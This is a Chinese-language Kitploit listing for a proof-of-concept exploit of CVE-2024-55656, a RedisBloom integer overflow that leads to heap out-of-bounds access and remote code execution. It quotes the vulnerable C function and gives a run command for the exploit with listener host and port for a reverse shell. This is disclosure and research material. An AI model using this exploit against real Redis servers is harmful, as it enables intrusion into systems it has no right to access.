Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
redis-stack-CVE-2024-55656 — 针对CVE-2024-55656的概念验证利用程序,该漏洞是RedisBloom中的一个整数溢出,导致基于堆的越界读写以及在Redis Stack 7.2.0-v10中的远程代码执行。 | Kitploit
工具/GitHubGitHub/rick2600/redis-stack-cve-2024-55656
内存取证漏洞分析漏洞利用渗透测试数据库安全二进制利用
GitHubrick2600/redis-stack-cve-2024-55656

redis-stack-CVE-2024-55656

针对CVE-2024-55656的概念验证利用程序,该漏洞是RedisBloom中的一个整数溢出,导致基于堆的越界读写以及在Redis Stack 7.2.0-v10中的远程代码执行。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
41年前尚未审核

CVE-2024-55656 - Redis Stack - RedisBloom 整数溢出远程代码执行漏洞

  • 标题:Redis Stack RedisBloom 整数溢出远程代码执行漏洞
  • ZDI:ZDI-25-009
  • CVE:CVE-2024-55656
  • 致谢:rick2600 和 gqsilva
  • CVSS:8.8(高危)
  • 受影响版本:RedisBloom v2.6.12,随 Redis Stack 7.2.0-v10 发布

分析(简短版)

RedisBloom(https://github.com/RedisBloom/RedisBloom)中存在一个整数溢出漏洞,该模块用于 redis(https://redis.io/docs/latest/develop/data-types/probabilistic/bloom-filter/)中。该整数溢出漏洞允许攻击者(知道密码的 redis 客户端)由于回绕而在堆上分配比所需内存更少的内存。然后,可以在此分配的内存之外进行读写,导致信息泄露和越界写入。

该整数溢出位于 CMS.INITBYDIM 命令中,该命令将 Count-Min Sketch 初始化为用户指定的维度。它接受两个值(width 和 depth),并在 NewCMSketch() 中使用它们来分配内存。

文件:src/cms.c

root@kitploit:~
CMSketch *NewCMSketch(size_t width, size_t depth) {
    assert(width > 0);
    assert(depth > 0);

    CMSketch *cms = CMS_CALLOC(1, sizeof(CMSketch));

    cms->width = width;
    cms->depth = depth;
    cms->counter = 0;
    cms->array = CMS_CALLOC(width * depth, sizeof(uint32_t));

    return cms;
}

通过 CMS.QUERY 命令(在 CMS_Query() 中实现)实现越界读取。

通过 CMS.INCRBY 命令(在 CMS_IncrBy() 中实现)实现越界写入。

完整分析请查看公告

概念验证

  1. 启动 redis-stack

docker run -p 6379:6379 --name redis-stack redis/redis-stack:7.2.0-v10

  1. 运行漏洞利用程序

python exploit.py --host 172.17.0.2 --port 6379 --lhost 172.17.0.1 --lport 4444

参考

  1. https://www.zerodayinitiative.com/advisories/ZDI-25-009/
  2. https://github.com/RedisBloom/RedisBloom/security/advisories/GHSA-x5rx-rmq3-ff3h
  3. https://redis.io/blog/security-advisory-cve-2024-46981-cve-2024-51737-cve-2024-51480-cve-2024-55656/
下载工具